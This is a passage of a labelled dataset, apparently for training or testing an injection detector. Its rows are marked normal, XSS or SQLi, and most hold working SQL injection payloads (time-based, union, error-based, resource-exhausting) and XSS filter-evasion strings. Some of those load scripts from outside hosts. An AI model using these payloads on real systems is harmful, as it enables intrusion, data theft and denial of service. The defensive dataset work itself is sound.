(SELECT(SLEEP(5)))YYYY))|[1,2,SQLi,11258 -"-5573' ) union all select 2866,2866,2866,2866,2866,2866,2866,2866,2866--",2,SQLi,18101 -1' ) where 1502 = 1502 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,15368 -"{""id"":null,""firstName"":""Jimmy"",""lastName"":""Ng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25243 -1'|| ( select 'yucg' where 2576 = 2576 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) ) ||',2,SQLi,19930 -1'|| ( select 'zoqo' from dual where 2063 = 2063,2,SQLi,20991 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""lzyl"" like ""lzyl",2,SQLi,14149 -"{""id"":null,""name"":""goose""}",0,normal,25613 -Where's the missing puzzle piece?,0,normal,22859 -"1 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17510 -"<nobr ondblclick=""alert(1)"">test</nobr>",1,XSS,7787 -<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>,1,XSS,30 -Where's the missing key to your room?,0,normal,23169 -alter,0,normal,23301 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13",2,SQLi,10548 -"nan,",2,SQLi,22629 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i",2,SQLi,11143 -"<dt onkeydown=""alert(1)"" contenteditable>test</dt>",1,XSS,4107 -"1' ) ) as peeo where 5356 = 5356 and elt ( 4722 = 2382,2382 ) --",2,SQLi,15424 -<textarea id=x tabindex=1 onactivate=alert(1)></textarea>,1,XSS,4035 -"1 ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,16068 -"<script\x3Etype=""text/javascript"">javascript:alert(1);</script>",1,XSS,335 -"-2072"" ) as rjcz where 2491 = 2491 or 6872 = 6872--",2,SQLi,12343 -(sleep 5),2,SQLi,11417 -"<a ondblclick=""alert(1)"">test</a>",1,XSS,3009 -"<dir draggable=""true"" ondragend=""alert(1)"">test</dir>",1,XSS,2228 --6405%' ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( '%' = ',2,SQLi,16079 -Let's explore where the hiking trail ends.,0,normal,24113 -select case when 1238 = 9044 then 1 else null end--,2,SQLi,17421 -"<dd onbeforecopy=""alert(1)"" contenteditable>test</dd>",1,XSS,1750 -"<hr onmouseleave=""alert(1)"">test</hr>",1,XSS,8256 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></map>",1,XSS,3059 -"-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # iuij",2,SQLi,20433 -"{""id"":null,""name"":""pass several""}",0,normal,25556 -<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus>,1,XSS,2116 -select * from users where id = '1' + $+%\ or 1 = 1 -- 1',2,SQLi,11689 -"-1907"" ) ) or 2782 = 3591",2,SQLi,15721 -<animatetransform onpointermove=alert(1)>XSS</animatetransform>,1,XSS,4160 -"1 ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20486 -"1' ) ) as mjps where 2179 = 2179 union all select null,null,null,null,null,null,null--",2,SQLi,17126 -Select a flavor for the ice cream.,0,normal,24311 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23",2,SQLi,11014 -"1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and 'ytlf' = 'ytlf",2,SQLi,12347 -"<script onLoad script onLoad=""javascript:javascript:alert(1)""></script onLoad>",1,XSS,374 -<dfn onpointermove=alert(1)>XSS</dfn>,1,XSS,2221 -if ( 3593 = 3779 ) select 3593 else drop function qtqy--,2,SQLi,16675 -"<output onmousemove=""alert(1)"">test</output>",1,XSS,3048 -"ABC<div style=""x:\xE2\x80\x8Aexpression(javascript:alert(1)"">DEF",1,XSS,452 -"<u onbeforecut=""alert(1)"" contenteditable>test</u>",1,XSS,5000 -"<div draggable=""true"" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup>",1,XSS,4446 -"1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""djrh"" = ""djrh",2,SQLi,22150 -<body onerror=alert(1) onload=/>,1,XSS,4716 -"<style>@keyframes x{}</style><header style=""animation-name:x"" onanimationend=""alert(1)""></header>",1,XSS,2920 -"<form ondblclick=""alert(1)"">test</form>",1,XSS,1834 -<script onpointerenter=alert(1)>XSS</script>,1,XSS,6593 -"1"" ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,17370 -"<optgroup draggable=""true"" ondragend=""alert(1)"">test</optgroup>",1,XSS,5460 -<details id=x tabindex=1 onfocusin=alert(1)></details>,1,XSS,6530 -1' ) where 2840 = 2840,2,SQLi,20273 -<spacer id=x tabindex=1 onactivate=alert(1)></spacer>,1,XSS,2186 -<applet id=x tabindex=1 onfocus=alert(1)></applet>,1,XSS,7271 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#",2,SQLi,10843 -"1"" ) where 1700 = 1700 union all select null,null,null,null,null#",2,SQLi,19578 -"1' ) ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,15612 -I need to decide where to go for a swim.,0,normal,23928 -"<shadow onmouseleave=""alert(1)"">test</shadow>",1,XSS,5161 -"<sup draggable=""true"" ondrag=""alert(1)"">test</sup>",1,XSS,7851 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'nimx' = 'nimx",2,SQLi,12328 -"{""id"":null,""firstName"":""Jennifer"",""lastName"":""Lin"",""address"":""73 Southern Blvd"",""city"":""990"",""telephone"":""6401918600""}",0,normal,26072 -"1"" ) ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""abcw"" = ""abcw",2,SQLi,17070 -"-8203"" ) union all select 6394,6394,6394,6394,6394--",2,SQLi,18117 -"1' in boolean mode ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) #",2,SQLi,22134 -Select your priority.,0,normal,25064 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",2,SQLi,10653 --4892%' ) ) or 2251 = 9881--,2,SQLi,12464 -"<header onkeyup=""alert(1)"" contenteditable>test</header>",1,XSS,6076 -<progress onpointerdown=alert(1)>XSS</progress>,1,XSS,8881 -"<style>@keyframes slidein {}</style><nextid style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nextid>",1,XSS,7354 -"1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and 'hmqq' = 'hmqq",2,SQLi,14413 -"-3379 ) union all select 4985,4985,4985,4985,4985,4985,4985,4985,4985,4985--",2,SQLi,14549 -"-1949"" ) ) as urke where 8761 = 8761 union all select 8761,8761,8761,8761,8761,8761,8761#",2,SQLi,13747 -select ( case when ( 4755 = 4784 ) then 1 else 4755* ( select 4755 from master..sysdatabases ) end ) --,2,SQLi,15989 -"<style>@keyframes x{}</style><ruby style=""animation-name:x"" onanimationstart=""alert(1)""></ruby>",1,XSS,3358 -"<dir onkeypress=""alert(1)"" contenteditable>test</dir>",1,XSS,4045 -AND 1=0 AND '%'=',2,SQLi,10257 -"-8060"" ) where 5290 = 5290 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,15535 -Select the ideal solution.,0,normal,24462 -"1 ) and make_set ( 1559 = 4863,4863 )",2,SQLi,18732 -"<style>:target {transform: rotate(180deg);}</style><ruby id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></ruby>",1,XSS,6282 -"1'|| ( select 'sned' where 4957 = 4957 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,15151 -"-3278' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'zxig' like 'zxig",2,SQLi,14985 -"1' in boolean mode ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,20722 -1%' ) ) ) and ( 9404 = 8390 ) *8390 and ( ( ( '%' = ',2,SQLi,17900 -"<xmp onmousemove=""alert(1)"">test</xmp>",1,XSS,4843 -Select a method to relax.,0,normal,24205 -"<video onclick=""alert(1)"">test</video>",1,XSS,8632 -<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote>,1,XSS,5346 -Create story.,0,normal,23247 -"{""id"":null,""name"":""sang spent rather paint""}",0,normal,25651 -Update your travel plans for the trip.,0,normal,23159 -<xmp onpointermove=alert(1)>XSS</xmp>,1,XSS,3489 -"<style>@keyframes x{}</style><embed style=""animation-name:x"" onanimationend=""alert(1)""></embed>",1,XSS,6456 -<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus>,1,XSS,6224 -"<img src=""mocha:document.vulnerable=true;"">",1,XSS,1476 -"1"" ) where 9093 = 9093",2,SQLi,21476 -<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus>,1,XSS,3185 -"admin""or 1=1 or """"=""",2,SQLi,9996 -Merge financial records for the annual report.,0,normal,23103 -"<div draggable=""true"" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i>",1,XSS,3922 -"{""id"":null,""firstName"":""Christopher"",""lastName"":""Kwan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25713 -"<svg oncopy=""alert(1)"" contenteditable>test</svg>",1,XSS,3538 -"<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>",1,XSS,9210 -"<dl onmouseout=""alert(1)"">test</dl>",1,XSS,1948 -"1"" or sleep ( 5 ) and ""telb"" = ""telb",2,SQLi,16947 -Filter the posts,0,normal,23084 -"1%"" and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ""%"" = """,2,SQLi,19517 -"-1187' ) union all select 8202,8202,8202,8202,8202,8202,8202#",2,SQLi,16949 -"1"" ) as jtou where 8129 = 8129 and 7533 = 7533--",2,SQLi,13759 -<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus>,1,XSS,4346 -"{""id"":null,""firstName"":""Rita"",""lastName"":""Ong"",""address"":""4 B Blue Ridge Blvd"",""city"":""931"",""telephone"":""986131662""}",0,normal,25920 -"1' where 7104 = 7104 union all select null,null,null,null,null,null,null#",2,SQLi,12434 -Select the best course of action.,0,normal,24281 --5031' or 9323 = 9323#,2,SQLi,18529 +`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>",1,XSS,9518 +&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;,1,XSS,1319 +"1"" ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ""uzbl"" = ""uzbl",2,SQLi,19790 +"<header onbeforepaste=""alert(1)"" contenteditable>test</header>",1,XSS,4306 +1'+ ( select mfcd where 6757 = 6757 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) +',2,SQLi,16186 +"1%"" and 2006 = 2006",2,SQLi,22073 +1 ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 1233 = 1233,2,SQLi,20622 +"<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>",1,XSS,9654 +1'+ ( select 'wyed' where 9896 = 9896,2,SQLi,20952 +select ( case when ( 7978 = 6009 ) then 7978 else 1/ ( select 0 ) end ) --,2,SQLi,12037 +Where's your SQL expertise?,0,normal,23336 +"1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'udvq' = 'udvq",2,SQLi,17621 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#",2,SQLi,10599 +FALSE,0,normal,23206 +or 1=1 LIMIT 1;#,2,SQLi,9940 +"1' ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'zfrs' = 'zfrs",2,SQLi,16079 +1%' order by 1#,2,SQLi,12268 +"1 ) ) as nlzg where 1482 = 1482 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,13784 +"<del onbeforepaste=""alert(1)"" contenteditable>test</del>",1,XSS,1969 +1' ) where 5680 = 5680 and ( 3020 = 3020 ) *6703--,2,SQLi,19244 +millisecond,0,normal,23208 +Create a captivating story.,0,normal,22599 +"1%"" ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,16052 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></fieldset>",1,XSS,3644 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( ""mofa"" like ""mofa",2,SQLi,18369 +"<del ondblclick=""alert(1)"">test</del>",1,XSS,4535 +Modi nd his Govt have no guts b ban anyone of their Chinese etc Citizen of India should Ban Modi Govts misconduct!!. Beware of Shameless and Selective Deshbhakti!!!,0,normal,26444 +word1,0,normal,26468 +"<a href=""\x10javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,483 +<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus>,1,XSS,3972 +<svg><animatetransform onbegin=alert(1) attributeName=transform>,1,XSS,4502 +1'+ ( select zwsr where 6567 = 6567,2,SQLi,15853 +"<!--#exec cmd=""/bin/echo 'IPT SRC=http://.rocks/.js>",1,XSS,7443 +admin' or 1=1,2,SQLi,9873 +"1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'zpyx' = 'zpyx",2,SQLi,19436 +Merge sources.,0,normal,23031 +"-7233"" ) where 7574 = 7574 or 5821 = 3288",2,SQLi,14078 +"<style>:target {transform: rotate(180deg);}</style><ol id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></ol>",1,XSS,2936 +You can also select from special pages meant for different states in the USA.,0,normal,25065 +"1 ) ) as ambt where 5198 = 5198 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12379 +"1"" ) ) as ktue where 6392 = 6392 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13439 +Select switch.,0,normal,24723 +"<strike oncut=""alert(1)"" contenteditable>test</strike>",1,XSS,3849 +"1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ""nbfe"" = ""nbfe",2,SQLi,12264 +<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus>,1,XSS,3224 +"1'|| ( select 'rask' from dual where 9411 = 9411 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ) ||'",2,SQLi,13371 +1 ) as sdnd where 9472 = 9472,2,SQLi,14510 +"<style>:target {color:red;}</style><area id=x style=""transition:color 1s"" ontransitionend=alert(1)></area>",1,XSS,7089 +"1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""ardk"" like ""ardk",2,SQLi,15761 +"<summary ondblclick=""alert(1)"">test</summary>",1,XSS,2362 +"<rb oncopy=""alert(1)"" contenteditable>test</rb>",1,XSS,6483 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ""poik"" = ""poik",2,SQLi,20069 +"<SCRIPT/SRC=""http://xss.rocks/xss.js""></SCRIPT>",1,XSS,248 +1'+ ( select 'rpds' where 5870 = 5870 and 4595 = 4595#,2,SQLi,18268 +Create site.,0,normal,23073 +select pg_sleep ( 5 ) and ( ( 'rnzp' = 'rnzp,2,SQLi,19592 +"1"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ""vnei"" like ""vnei",2,SQLi,13813 +"1"" where 4445 = 4445 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,19563 +"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 2 ) ) AND 'i' = 'i",2,SQLi,11694 +<form id=x tabindex=1 onbeforeactivate=alert(1)></form>,1,XSS,8073 +"1'+ ( select 'vbqo' where 5630 = 5630 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13139 +( 2329 = 4209 ) *1,2,SQLi,12968 +"select * from users where id = 1 or ""@;"" = 1 or 1 = 1 -- 1",2,SQLi,11891 +(SELECT * FROM (SELECT(SLEEP(5)))ecMj),2,SQLi,10297 +"-1917"" ) or 8571 = 8571--",2,SQLi,15539 +Select a painting style for expression.,0,normal,24219 +<slot onpointerleave=alert(1)>XSS</slot>,1,XSS,5322 +"<template onmouseleave=""alert(1)"">test</template>",1,XSS,3871 +1' where 2134 = 2134 rlike ( select ( case when ( 3613 = 2090 ) then 1 else 0x28 end ) ) --,2,SQLi,14113 +"select * from users where id = 1 union select @ $$,version ( ) -- 1",2,SQLi,11948 +select case when 6229 = 2077 then 1 else null end--,2,SQLi,12492 +@var select @var as var into temp end --,2,SQLi,11045 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16",2,SQLi,10409 +"1 ) ) as gdcg where 2329 = 2329 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22334 +1' in boolean mode ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,20348 +"select * from users where id = 1 +\. union select null,@@VERSION -- 1",2,SQLi,11735 +"1 ) ) ) and make_set ( 8882 = 1593,1593 ) and ( ( ( 7989 = 7989",2,SQLi,20139 +"<option onbeforecut=""alert(1)"" contenteditable>test</option>",1,XSS,2735 +"<script ="">"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,1497 +1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'zoin' = 'zoin,2,SQLi,17796 +"<tbody onmouseup=""alert(1)"">test</tbody>",1,XSS,2136 +"1"" where 5977 = 5977",2,SQLi,21091 +"<dir onkeypress=""alert(1)"" contenteditable>test</dir>",1,XSS,4027 +"-5043%' ) ) ) union all select 5860,5860,5860,5860,5860#",2,SQLi,15246 +"<a href=""\x18javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,473 +"<style>@keyframes slidein {}</style><noframes style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></noframes>",1,XSS,2088 +-4644 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # upwd,2,SQLi,20580 +"Select ""Profile,"" which has a picture of your account avatar.",0,normal,25636 +1' ) where 8163 = 8163,2,SQLi,17012 +"All About Nina, costarring Common, opens in select theaters Sept. 28.",0,normal,26349 +"1 ) as czeu where 1738 = 1738 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,14340 +"1 ) where 5465 = 5465 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,14868 +"<figcaption ondblclick=""alert(1)"">test</figcaption>",1,XSS,7739 +1%' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( '%' = ',2,SQLi,14269 +INSERT INTO Documents WHERE ID=x,2,SQLi,10734 +"1"" ) as upjw where 3880 = 3880 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,15974 +"To check that the SQL transact statement really is working, let us check the customer table before and after the INSERT... SELECT.",0,normal,25245 +"1' ) where 3262 = 3262 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,12514 +-5615' ) where 5931 = 5931 or 8450 = 9229,2,SQLi,21443 +1' ) as xiqw where 8507 = 8507 rlike sleep ( 5 ) --,2,SQLi,12741 +or 1 = 1 or '' = ',2,SQLi,11388 +"`'><script>\x21javascript:alert(1)</script> +`'><script>\xE2\x80\x82javascript:alert(1)</script>",1,XSS,550 +"<dir draggable=""true"" ondragenter=""alert(1)"">test</dir>",1,XSS,5101 +"1' ) as ycsr where 2238 = 2238 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13178 +"According to 9to5Mac, here's how to solve your problems: Using your Google/Gmail account with Mail on iOS 11: Go to Settings ? Accounts & Passwords Select Add Account Select Google Input your credentials Return to Accounts & Passwords Select Fetch New Data Select the Automatically schedule under Fetch The only downfall appears to be the fact that your iPhone's Mail app will only automatically fetch your mail only when on power and Wi-Fi.",0,normal,26369 +"Dim sum plates and tea are brought around by cart, and you select whatever appeals to you.",0,normal,26195 +"<spacer oncut=""alert(1)"" contenteditable>test</spacer>",1,XSS,7820 +"<ruby ondblclick=""alert(1)"">test</ruby>",1,XSS,5072 +"<footer oncut=""alert(1)"" contenteditable>test</footer>",1,XSS,2145 +"select * from users where id = 1 or 1#""{ union select 1,version ( ) -- 1",2,SQLi,11507 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 7711 = 7711",2,SQLi,17753 +"<form oncontextmenu=""alert(1)"">test</form>",1,XSS,2406 +select,0,normal,26546 +"-7184 ) as fshx where 3408 = 3408 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,14972 +"1"" ) ) as sqzh where 5672 = 5672 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,22207 +"1 ) where 9469 = 9469 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,20299 +<cite id=x tabindex=1 onfocusin=alert(1)></cite>,1,XSS,5100 +<var onpointerleave=alert(1)>XSS</var>,1,XSS,1906 +"1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # rhli",2,SQLi,20189 +<video onpointerout=alert(1)>XSS</video>,1,XSS,2405 +1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ),2,SQLi,15638 +<custom tags onpointerdown=alert(1)>XSS</custom tags>,1,XSS,4204 +<svg><set onbegin=alert(1) attributename=x dur=1s>,1,XSS,6307 +"1' ) ) as orvy where 7270 = 7270 union all select null,null,null,null,null,null,null,null#",2,SQLi,15122 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#",2,SQLi,10439 +<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav>,1,XSS,3230 +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr>,1,XSS,5459 +"UNION ALL SELECT 1,2,3,4",2,SQLi,10727 +1 ) where 2918 = 2918 and 7533 = 7533--,2,SQLi,22412 +"-4259' ) ) as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --",2,SQLi,18796 +"1"" or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,19700 +Select the right path for your adventure.,0,normal,24000 +"<br oncopy=""alert(1)"" contenteditable>test</br>",1,XSS,4443 +1 ) as afmb where 8665 = 8665 order by 1#,2,SQLi,20837 +"1"" ) ) as osuh where 8809 = 8809",2,SQLi,12265 +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +>><script>alert(""XSS"")</script>&",1,XSS,1624 +"<form><button formaction=""javascript:javascript:alert(1)"">X",1,XSS,581 +"<;SCRIPT a="";>;""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,1596 +"1' ) ) as xntz where 5801 = 5801 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,12537 +<strong onpointerup=alert(1)>XSS</strong>,1,XSS,6751 +"<ol oncopy=""alert(1)"" contenteditable>test</ol>",1,XSS,4257 +"1' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'csmu' = 'csmu",2,SQLi,20783 +"1, ( select ( case when ( 5885 = 1825 ) then 1 else 5885* ( select 5885 from master..sysdatabases ) end ) )",2,SQLi,21111 +Select your think.,0,normal,24937 +"<td onmouseup=""alert(1)"">test</td>",1,XSS,3494 +"1 ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char 